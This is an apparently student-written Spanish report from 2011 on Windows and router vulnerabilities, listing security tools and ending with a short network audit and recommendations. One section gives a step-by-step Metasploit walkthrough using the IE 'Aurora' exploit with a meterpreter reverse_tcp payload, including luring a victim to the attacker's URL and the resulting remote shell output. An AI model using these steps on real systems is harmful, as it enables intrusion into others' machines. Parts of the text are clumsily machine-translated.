VULNERABILIDADES DE WINDOWS
Vulnerabilidades de Windows
16 de mayo de 2011
Página 2
INTRODUCCION:
El siguiente documento contiene lo que son algunas de las vulnerabilidades del Sistema Operativo
Windows, las cuales pueden ocasionar que a través de ellas se produzca algún tipo de ataque que
afecte la seguridad de la datos que se encuentren almacenados dentro del equipo.
El detectar los posibles ataques a los que se puede ver afectado ayuda a brindar una mayor
seguridad al sistema. Y prevenir que se vea atacado por personas que le den un mal uso a la
información o que ocasionen graves problemas dentro de la organización.
Así como también se darán a conocer algunas de las vulnerabilidades que se tienen en el uso de
algunos tipos de rauters.
Vulnerabilidad en DNS
Microsoft ha reportado que está investigando reportes de ataques que explotan una vulnerabilidad
en el servicio DNS (DomainNameSystem) de servidor en sistemas Microsoft Windows 2000 SP4,
Windows Server 2003 SP1, y Windows Server 2003 SP2. La vulnerabilidad es del tipo buffer
overrun (desbordamiento de memoria) en la interfaz RPC (RemoteProcedureCall) del servicio DNS.
RPC es un protocolo que un programa puede usar para requerir un servicio desde un programa
alojado en otra computadora en la red. De acuerdo con el reporte de Microsoft, los intentos para
explotar esta vulnerabilidad podrían permitir a un atacante ejecutar código en el contexto de
Vulnerabilidades de Windows
16 de mayo de 2011
Página 3
seguridad del servicio DNS, que de forma predeterminada se ejecuta como SYSTEM local. Hasta la
fecha no existe parche de seguridad para corregir la vulnerabilidad
Ataque por Correo Electronico
Para que tenga éxito este tipo de ataque, el atacante tendría que enviar un correo electrónico con un
archivo adjunto de Microsoft Word o Power Point que incluyera una imagen en miniatura
especialmente manipulada y convenciera al usuario de que abriera dicho documento, ha explicado
la compañía.
El atacante, asegura Microsoft, también podría poner el archivo con la imagen maliciosa en una red
compartida y que las víctimas potenciales llegaran a la localización del archivo a través del
explorador de Windows.
El fallo, que afecta al motor de renderización gráfica de Windows, podría permitir que un atacante
ejecutara código arbitrario en el contexto de seguridad del usuario conectado, lo que significa que
las cuentas que están configuradas para tener menos derechos se verían afectadas menos.
La vulnerabilidad afecta a Windows XP Service Pack 3, XP Professional x64 EditionService Pack
2, Server 2003 Service Pack 2, Server 2003 x64 EditionService Pack 2, Server 2003 con SP2 para
sistemas basados en Itanium, Vista Service Pack 1 y Service Pack 2, Vista x64 EditionService Pack
1 y Service Pack 2, Server 2008 para 32-bit, 64-bit, y sistemas basados en Itanium.
El problema no afecta al sistema operativo para PC más reciente de Microsoft, Windows 7, ni a su
sistema operativo para servidores, Windows Server 2008 R2.
Ataques Land
Tanto Windows XP SP2 como W2003 siguen siendo vulnerables a ataques LAND. Este tipo de
ataques no son nuevos y se producen cuando la máquina víctima recibe paquetes SYN con la
misma IP de origen y destino, lo que provoca que empiece a generar paquetes ACK tratando de
responderse a sí misma en lo que podría ser un bucle sin fin, con alto consumo de CPU y
saturación, llegándose a la denegación de servicio. Es algo que los reglajes internos de
algunos firewalls y routers evitan, filtrando los paquetes con la misma dirección de origen y destino.
Defecto en archivo de Windows
Muchas funciones claves de Windows se ven amenzadas con la alta vulnerabilidad que presenta el
componente del núcleo llamado win32k.sys, el cual puede ser atacado por usuarios locales y
ocasiona la aparición de la famosa pantalla azul, ícono de las fallas graves de sistema.
Este defecto también permite al atacante ejecutar códigos libremente, lo que puede ocasionar
diferentes problemas al sistema operativo, dependiendo de la amplitud de acción de quien intenta
hacer el daño.
El componente win32k.sys se encarga de gestionar las ventanas y los gráficos 2D de Windows, por
lo que su función es clave a nivel de usuario. Una manipulación maliciosa de este archivo puede
hacer colapsar la parte gráfica de Windows y con ello la pantalla, entre otras cosas.
Vulnerabilidades de Windows
16 de mayo de 2011
Página 4
La vulnerabilidad de este componente afecta a Windows XP, Windows Server 2003, Windows
Vista, Windows Server 2008, Windows Server 2008 R2 y Windows 7, tanto para x86 y x64, tengan
o no añadidos Service Packs.
Esta falla también hace posible que cualquier usuario normal pueda acceder como si tuviera
privilegios y, a partir de eso, ejecutar las alteraciones maliciosas en el sistema.
Windows XP SP3 IE 7,8 Ejecución remota de código
Este ataque, funciona con internet explorer 7,8 pero sólo cuando se utiliza en windows XP. Si se
utiliza Vista o windows 7, No son vulnerables.
El error, en el archivo WinHlp32.exe va en el desbordamiento de la pila, y nos permite ejecutar
código.
Es posible invocar winhlp32.exe desde Internet Explorer 8,7,6 con VBScript. Pasando
malintencionado.Podría permitir archivo HLP winhlp32 atacante remoto ejecutar comandos
arbitrarios. Además, existe una vulnerabilidad de desbordamiento de pila en winhlp32.exe.
Se ve afectado Windows XP SP3 no afecta a Vista, Windows 7.
Para activar la vulnerabilidad es necesaria alguna interacción del usuario. Víctima tiene que
Presione F1 cuando se muestra el menú emergente MsgBox.
Sintaxis de la función MsgBox:
MsgBox(prompt[,buttons][,title][,helpfile,context])
Es posible pasar compartido remoto samba como parámetro helpfile. Además hay un búfer de pila
basada desbordamiento cuando helpfile ,parámetro es demasiado largo. Sin embargo, en XP
winhlp32.exe se compila con /Bandera de GS, que, en este caso, efectivamente proteger la pila.
La vulnerabilidad permite a un atacante remoto ejecutar código arbitrario en
máquina de la víctima.
Hackear WINDOWS con metasploit y IE
Usando este exploit, Podremos tomar el control de la máquina remota con los privilegios del
usuario que está navegando por internet. Ataque realizado desde Ubuntu a Windows.
La primera cosa a hacer, que Metasploit está abierto en la consola
Vulnerabilidades de Windows
16 de mayo de 2011
Página 5
Una vez instalado, o si ya tenemos, la primera cosa a hacer, actualizar la vulnerabilidad para
obtener lo que, a continuación, escribir:
svnupdate
abrirlo:
sudo ./msfconsole
Pues ahora se sube la vulnerabilidad. A continuación, el tipo de consola:
use exploit/windows/browser/ms10_002_aurora
acontinuación,:
set PAYLOAD windows/meterpreter/reverse_tcp
acontinuación,:
set LHOST NOSTRO IP (lo possiamovedere digitando: ifconfig )
acontinuación,:
set URIPATH /
y finalmente lanzar el ataque escribiendo:
exploit
En este punto se tiene una salida como esta:
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http//NOSTRO_IP:8080/
[*] Server started.
msfexploit(ie_aurora) >
En este momento tan visite nuestra “Buddy” Esta dirección:
http//NOSTRO_IP:8080/
Una vez que nuestro compañero visitará esa dirección, Tendremos una salida como esta:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
pues ahora se debe escribir:
sessions -i 1
Ahora para abrir el tipo de concha:
Shell
Recibimos esta salida:
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
Vulnerabilidades más críticas de los sistemas Windows
Vulnerabilidades de Windows
16 de mayo de 2011
Página 6
Existencia de servidores web y sus servicios asociados
Cuando se instala un servidor web en un equipo Windows, en su configuración por defecto, se
activan algunos servicios y/o configuraciones que son vulnerables a diversos tipos de ataques, que
van desde la denegación de servicio hasta el compromiso total del sistema.
Si la máquinadebe actuar como servidor web, es preciso verificar que la versión del mismo está
actualizada, se ha fortalecido la configuración y se han desactivado los servicios innecesarios.
Es importante indicar que algunas versiones de Windows instalan, en su configuración por defecto,
el servidor web IIS.
Servicio Workstation
Existe una vulnerabilidad de desbordamiento de búfer en el servicio Workstation de Windows 2000
(SP2, SP3 y SP4) y Windows XP (hasta SP1) que puede ser utilizada por un usuario remoto para
forzar la ejecución de código en los sistemas vulnerables. Éste código se ejecutará en el contexto de
seguridad SYSTEM, lo que permite un acceso completo en el sistema comprometido.
Servicios de acceso remoto de Windows
Todas las versiones de Windows incluyen mecanismos para permitir el acceso remoto tanto a las
unidades de disco y al registro así como para la ejecución remota de código. Estos servicios han
demostrado ser bastante frágiles y la existencia de numerosas vulnerabilidades ha sido uno de los
mecanismos preferidos por los gusanos y virus para propagarse. Es muy importante verificar que se
han aplicado las diversas actualizaciones publicadas para impedir la acciones de los mismos.
Microsoft SQL Server
El gestor de base de datos de Microsoft ha sido, tradicionalmente, un producto con un nivel de
seguridadmuybajo.
Por un lado, existen un gran número de vulnerabilidades de seguridad, muchas de ellas críticas, que
pueden ser utilizadas para acceder y/o modificar a la información almacenada en las bases de datos.
Peroademás, la configuración por defecto de Microsoft SQL Server facilita que sea utilizado como
plataforma para la realización de ataques contra otros sistemas. Podemos recordar los gusanos
SQLSnake y Slammer que tuvieron un efecto perceptible en toda la red Internet.
Autenticación de Windows
Es habitual encontrar equipos Windows con deficiencias en sus mecanismos de autenticación. Esto
incluye la existencia de cuentas sin contraseña (o con contraseñas ampliamente conocidas o
fácilmente deducibles). Por otra parte es frecuente que diversos programas (o el propio sistema
operativo) cree nuevas cuentas de usuario con un débil mecanismo de autenticación.
Vulnerabilidades de Windows
16 de mayo de 2011
Página 7
Por otra parte, a pesar de que Windows transmite las contraseñas cifradas por la red, dependiendo
del algoritmo utilizado es relativamente simple aplicar ataques de fuerza bruta para descifrarlos en
un plazo de tiempo muy corto. Es por tanto muy importante verificar que se utilizado el algoritmo
de autenticación NTLMv2.
Navegadores web
Los diversos navegadores habitualmente utilizados para acceder a la web pueden ser un posible
punto débil de las medidas de seguridad si no se han aplicado las últimas actualizaciones.
Internet Explorer es, sin duda, el producto para el que se han publicado más actualizaciones y que
cuenta con algunos de los problemas de seguridad más críticos. No obstante debe recordarse que
otros navegadores como Opera, Mozilla, Firefox y Netscape también tienen sus vulnerabilidades de
seguridad.
Aplicaciones de compartición de archivos
Las aplicaciones P2P se han popularizado en los últimos años como un sistema para la compartición
de información entre los usuarios de Internet, hasta el punto de convertirse en uno de los métodos
preferidos para obtener todo tipo de archivos. De hecho, muchos usuarios seguramente no
entenderían la red actual sin la existencia de las aplicaciones P2P.
No obstante, algunas aplicaciones populares de compartición de archivos tienen serios problemas de
seguridad que pueden ser utilizados por un atacante para obtener el control del ordenador del
usuario.
Otro riesgos habituales, no estrictamente de seguridad pero si relacionado ya que atentan contra
nuestra privacidad, son los diversos programas espías incluidos en algunas de las aplicaciones más
populares de compartición de archivos.Otro problema habitual es la compartición inadvertida de
archivos quecontieneninformación sensible.
Por último, en los últimos meses se ha popularizado la utilización de las redes P2P como un nuevo
mecanismo para la distribución de virus y gusanos.
Subsistema LSAS
El subsistema LSAS (Local Security AuthoritySubsystem) de Windows 2000, Windows Server
2003 y Windows XP es vulnerable a diversos ataques de desbordamiento de búfer que pueden
permitir a un atacante remoto obtener el control completo del sistema vulnerable. Esta
vulnerabilidad ha sido explotada por gusanos como el Sasser.
Programa de correo
Vulnerabilidades de Windows
16 de mayo de 2011
Página 8
Diversas versiones de Windows incluyen de forma estándar el programa de correo Outlook Express.
Se trata de un producto que, si no se encuentra convenientemente actualizado, puede fácilmente
comprometer la seguridad del sistema.
Los principales problemas de seguridad asociados a Outlook Express son la introducción de virus
(sin que sea necesario ejecutar ningún programa) y el robo de información sensible.
Las versiones actuales de Outlook Express, configuradas de una forma adecuada, protegen al
usuario ante estos problemas de seguridad.
Sistemas de mensajería instantánea
La mensajería instantánea ha pasado de ser un sistema de comunicación utilizado básicamente para
contactar con amigos y familiares a ser una herramienta de comunicación habitualmente utilizada
en las empresas, especialmente entre aquellas que disponen de diversos centros de trabajo.
Los diversos programas de mensajería instantánea pueden ser víctimas de ataques explotables de
forma remota y que pueden ser utilizados para obtener el control de los sistemas vulnerables.
Es conveniente que el usuario de estos productos verifique que utiliza la versión actual, con las
últimas actualizaciones de seguridad.
VULNERABILIDADES DE LOS RAUTERS
Suplantación de identidad
Son susceptibles a interceptar y redireccionar tráfico a fin de acceder a la configuración del router; e
incluso a los datos de los ordenadores de la red local.
Esto se consigue haciendo que la víctima visite una página web diseñada para que “engañe” al
router y tome como IP secundaria de la página web la misma que la IP del router. El engaño se
basa en una antigua técnica llamada “DNS rebinding”. La facilidad en el acceso a la configuración
del router, se ve afectada si ha sido cambiada los datos de acceso por defecto del router,
dificultando así el acceso al panel de configuración del mismo.
Se recomienda cambiar los datos de acceso a la configuración del router; siempre y
cuando el usuario/contraseña sean los que venían por defecto en el router.
Ataques mediante UPnP
El protocolo UPnP (Universal Plug and Play) permite que diferentes dispositivos en una red
"conversen" entre ellos y que puedan autoconfigurarse. Por ejemplo, una aplicación de mensajería
como el Messenger utiliza el puerto 1503 para recibir un fichero de uno de nuestros contactos.
Mediante UPnP, es capaz de detectar y configurar el firewall de la red para abrir y redireccionar
este puerto.
Vulnerabilidades de Windows
16 de mayo de 2011
Página 9
Lo que se advierte es la facilidad con la que cualquier aplicación web puede modificar la
configuración de nuestra red. Simplemente visitando un sitio web malicioso que contenga un flash
con las instrucciones precisas puede modificar por ejemplo los DNS utilizados por nuestro router.
Este es el proceso normal de un dispositivo UPnP
1. Un dispositivo se conecta a la red
2. Obtiene una IP mediante DHCP
3. Lanza una petición UDP a 239.255.255.250:1900 y espera respuesta de los equipos con
UPnP
4. Estos responden anunciando la URL desde la que pueden ser controlados
5. El dispositivo envía mensajes SOAP a esta URL con los cambios necesarios
Lo que hace la aplicación flash, es llamar directamente a esa URL, solicitando por ejemplo el
cambio de DNS. Esta URL de control es distinta en cada modelo de router por lo que el riesgo se
reduce, ya que la aplicación flash deberá probar con cientos de URLs si quiere soportar el máximo
número de routers.
Es especialmente grave en el caso de los routerswifi, ya que cualquier cliente conectado puede
utilizar una herramienta UPnP para manipular los parámetros del router..De momento la solución
pasa por desactivar la característica UPnP en el router.
HERRAMIENTAS PARA HACKEAR
CAIN AND ABEL
Cain and Abel es una herramienta diseñada especialmente para administradores de redes con la que
puedes comprobar el nivel de seguridad de una red local doméstica o profesional.
El programa permite recuperar contraseñas de una amplia variedad de protocolos, entre ellos FTP,
SMTP, POP3, HTTP, MySQL, ICQ, Telnet y otros, además de poder recuperar también las claves
ocultas en Windows bajo la típica línea de asteriscos.
El programa incluye otras utilidades destinadas a la administración y control de redes.
HERRAMIENTAS PARA LINUX.
Vulnerabilidades de Windows
16 de mayo de 2011
Página 10
Ettercap
es un interceptor/sniffer/registrador para LANs con switch.
SSLStrip
una herramienta que automatiza el ataque sobre la conexión SSL.
Driftnet
programa que escucha el tráfico de red y elige imágenes de flujos TCP que observa.
WiFiSlax
es una distribución GNU/Linux en formato *.iso con funcionalidades de LiveCD y LiveUSB
pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en
general.
WiFiSlax incluye una larga lista de herramientas de seguridad y auditoría listas para ser utilizadas,
entre las que destacan numerosos escáner de puertos y vulnerabilidades, herramientas para creación
y diseño de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría
wireless, además de añadir una serie de útiles lanzadores.
Vulnerabilidades de Windows
16 de mayo de 2011
Página 11
FUENTES
http://www.clshack.it/es/exploit-windows-xp-sp3-ie-7-8-remote-code-execution.html
http://www.clshack.it/es/hack-windows-con-metasploit-e-ie-0day-aka-aurora-exploit.html
http://www.auditoria.com.mx/not/incidant.htm
http://blog.digitalmarketing.cl/defecto-en-archivo-de-windows-lo-hace-vulnerable-a-ataques/
http://www.somoslibres.org/modules.php?name=News&file=article&sid=307
http://bandaancha.eu/articulo/5312/mayoria-routers-son-vulnerables-ataques-mediante-upnp
http://foro.elhacker.net/hacking_linuxunix/how_to_sniffing_en_linux_ettercapsslstripdriftnet-
t280295.0.html#ixzz1OYsIn94v
http://es.wikipedia.org/wiki/WiFiSlax
Vulnerabilidades de Windows
16 de mayo de 2011
Página 12
REPORTE
1. Una de las principales vulnerabilidades detectadas fue que la red no tenía contraseña y era
pública.
2. El rauter tenía 2 usuarios un User y un Admin, el user no tenía contraseña y la contraseña del
Admin se podía obtener viendo las propiedades del rautes con el User y la contraseña estaba basada
solo en números.
3. Cuando hay actividad en el servidor, con las herramientas para hackear es más fácil encontrar la
contraseña ya que se empiezan a generar aún más paquetes.
4. La red se encontraba oculta, pero con herramientas para administrar el tráfico de red, se pueden
detectar.
RECOMENDACIONES
1. La red debería tener contraseña.
2. El rauter no tendría que tener la misma contraseña en el admin y el user.
3. Las contraseñas deberían contener tanto números como letras para que sea más difícil de
descifrar.
4. El servidor debe tener contraseña para que no sea fácil el conectarse por escritorio remoto.
5. Se deben fijar directivas para que no se pueda acceder tan fácilmente a los archivos dentro del
servidor.